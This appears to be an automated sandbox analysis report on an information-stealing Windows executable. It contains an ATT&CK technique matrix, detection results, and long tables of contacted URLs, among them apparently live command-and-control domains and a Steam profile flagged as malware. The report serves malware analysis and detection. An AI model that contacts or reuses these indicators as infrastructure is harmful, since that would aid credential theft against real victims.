    Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    2
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping641
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    2
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information
    NTDS223
    System Information Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://sergei-esenin.com/0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://sergei-esenin.com/apiM14%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e0%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    https://steamcommunity.com/workshop/0%VirustotalBrowse
    https://eaglepawnoy.store:443/api22%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    https://sergei-esenin.com:443/apifiles/765611997243319009%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://sergei-esenin.com:443/api19%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truetrueunknown
    sergei-esenin.com
    104.21.53.8
    truetrueunknown
    eaglepawnoy.store
    unknown
    unknowntrueunknown
    bathdoomgaz.store
    unknown
    unknowntrueunknown
    spirittunek.store
    unknown
    unknowntrueunknown
    licendfilteo.site
    unknown
    unknowntrueunknown
    studennotediw.store
    unknown
    unknowntrueunknown
    mobbipenju.store
    unknown
    unknowntrueunknown
    clearancek.site
    unknown
    unknowntrueunknown
    dissapoiznw.store
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    bathdoomgaz.storetrueunknown
    studennotediw.storetrueunknown
    clearancek.sitetrueunknown
    dissapoiznw.storetrueunknown
    https://steamcommunity.com/profiles/76561199724331900true
    • URL Reputation: malware
    unknown
    spirittunek.storetrueunknown
    licendfilteo.sitetrueunknown
    eaglepawnoy.storetrueunknown
    mobbipenju.storetrue
      unknown
      https://sergei-esenin.com/apitrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://steamcommunity.com/my/wishlist/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000004.00000003.1321594830.0000000001209000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://store.steampowU)file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://help.steampowered.com/en/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://steamcommunity.com/market/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://store.steampowered.com/news/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://sergei-esenin.com/file.exe, 00000004.00000003.1321868855.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmptrueunknown
          https://licendfilteo.site:443/apidfile.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://store.steampowered.com/subscriber_agreement/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://sergei-esenin.com/apiMfile.exe, 00000004.00000002.1598907170.00000000011BD000.00000004.00000020.00020000.00000000.sdmptrueunknown
            http://store.steampowered.com/subscriber_agreement/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.valvesoftware.com/legal.htmfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://steamcommunity.com/discussions/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://store.steampowered.com/stats/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://store.steampowered.com/steam_refunds/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://steamcommunity.com/workshop/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://eaglepawnoy.store:443/apifile.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://store.steampowered.com/legal/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://sergei-esenin.com/LOufile.exe, 00000004.00000003.1321868855.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011BD000.00000004.00000020.00020000.00000000.sdmptrue
              unknown
              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://store.steampowered.com/privacy_agreement/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://store.steampowered.com/points/shop/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://upx.sf.netAmcache.hve.9.drfalse
              • URL Reputation: safe
              unknown
              https://store.steampowered.com/file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.cloudflare.com/learning/access-manMVfile.exe, 00000004.00000003.1321868855.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                https://www.cloudflare.com/learning/access-manfile.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://sergei-esenin.com:443/apifiles/76561199724331900file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/privacy_agreement/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.cloudflare.com/5xx-error-landingfile.exe, 00000004.00000003.1321594830.0000000001209000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.cloudflare.com/5xx-erropfile.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://sergei-esenin.com:443/apifile.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://store.steampowered.com/account/cookiepreferences/file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/mobilefile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/about/file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://studennotediw.store:443/api:file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
